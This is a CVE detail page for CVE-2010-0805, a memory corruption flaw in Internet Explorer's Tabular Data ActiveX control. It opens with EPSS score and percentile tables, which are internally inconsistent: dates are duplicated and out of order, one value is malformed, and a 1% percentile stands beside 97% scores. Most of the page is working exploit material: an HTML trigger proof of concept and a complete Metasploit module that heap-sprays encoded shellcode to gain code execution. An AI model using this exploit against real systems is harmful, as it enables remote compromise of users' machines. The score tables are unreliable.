CVE-2010-0805 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	89.83%	–	–
2023-03-12	–	–	–	97%	–
2023-04-23	–	–	–	97.14%	–
2023-06-04	–	–	–	97.18%	–
2023-07-16	–	–	–	97.2%	–
2023-08-27	–	–	–	97.16%	–
2023-10-15	–	–	–	97.19%	–
2023-11-26	–	–	–	97.13%	–
2024-01-07	–	–	–	97.19%	–
2024-02-18	–	–	–	97.22%	–
2024-06-02	–	–	–	97.22%	–
2024-08-25	–	–	–	97.25%	–
2024-12-22	–	–	–	96.42%	–
2025-02-02	–	–	–	96.09%	–
2025-03-09	–	–	–	95.34%	–
2025-01-19	–	–	–	96.42%	–
2025-02-02	–	–	–	96.09%	–
2025-03-09	–	–	–	95.34%	–
2025-03-18	–	–	–	–	89.32%
2025-04-15	–	–	–	–	89.32%
2025-04-15	–	–	–	–	89.32,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	1%
2023-03-12	1%
2023-04-23	1%
2023-06-04	1%
2023-07-16	1%
2023-08-27	1%
2023-10-15	1%
2023-11-26	1%
2024-01-07	1%
2024-02-18	1%
2024-06-02	1%
2024-08-25	1%
2024-12-22	1%
2025-02-02	1%
2025-03-09	1%
2025-01-19	1%
2025-02-02	1%
2025-03-09	1%
2025-03-18	1%
2025-04-15	99%
2025-04-15	99%

# CVE : CVE-2010-0805 <!-- .text:600058F7 and [ebp+pv], 0 .text:600058FE lea eax, [ebp+pv] .text:60005904 push eax ; unsigned __int16 ** .text:60005905 push dword ptr [ebx+10h] ; struct IOleClientSite * .text:60005908 call GetHostURL(IOleClientSite *,ushort * *) .text:6000590D mov eax, [ebp+var_218] .text:60005913 push [ebp+pv] ; pv .text:60005919 mov [ebp+eax+var_204], 0 .text:60005921 mov eax, [ebp+var_21C] ; length of the DataURL param .text:60005927 mov [ebp+eax+var_104], 0 ; write one byte to arbitrary stack address --> <html> <title>Trigger for ZDI-10-034 by ZSploit.com</title> <head> </head> <body> <object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"> <param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/> </object> </body> </html> The ZSploit Team

## # $Id: ms10_018_ie_tabular_activex.rb 9179 2010-04-30 08:40:19Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption', 'Description' => %q{ This module exploits a memory corruption vulnerability in the Internet Explorer Tabular Data ActiveX Control. Microsoft reports that version 5.01 and 6 of Internet Explorer are vulnerable. By specifying a long value as the "DataURL" parameter to this control, it is possible to write a NUL byte outside the bounds of an array. By targeting control flow data on the stack, an attacker can execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Anonymous', # original discovery 'jduck' # metasploit version ], 'Version' => '$Revision: 9179 $', 'References' => [ [ 'CVE', '2010-0805' ], [ 'OSVDB', '63329' ], [ 'BID', '39025' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-034' ], [ 'MSB', 'MS10-018' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "", #"\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic (Heap Spray)', { 'Ret' => 0x0c0c0c0c } ], ], 'DisclosureDate' => 'Mar 09 2010', 'DefaultTarget' => 0)) end def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...") # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch)) # Set the return\nops ret = Rex::Text.to_unescape([target.ret].pack('V')) # ActiveX parameters #progid = clsid = "333C7BC4-460F-11D0-BC04-0080C7055A83" # exploit url url = "http://" #url << rand_text_alphanumeric(258) url << rand_text_alphanumeric(258+0x116+2) # Construct the final page var_unescape = rand_text_alpha(rand(100) + 1) var_shellcode = rand_text_alpha(rand(100) + 1) var_memory = rand_text_alpha(rand(100) + 1) var_spray = rand_text_alpha(rand(100) + 1) var_i = rand_text_alpha(rand(100) + 1) html = %Q|<html><body> <script> var #{var_memory} = new Array(); var #{var_unescape} = unescape; var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}'); var #{var_spray} = #{var_unescape}("#{ret * 2}"); do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0x4000 ); for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode}; </script> <object classid='clsid:#{clsid}'> <param name='DataURL' value='#{url}'/> </object> </body></html> | # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli) end end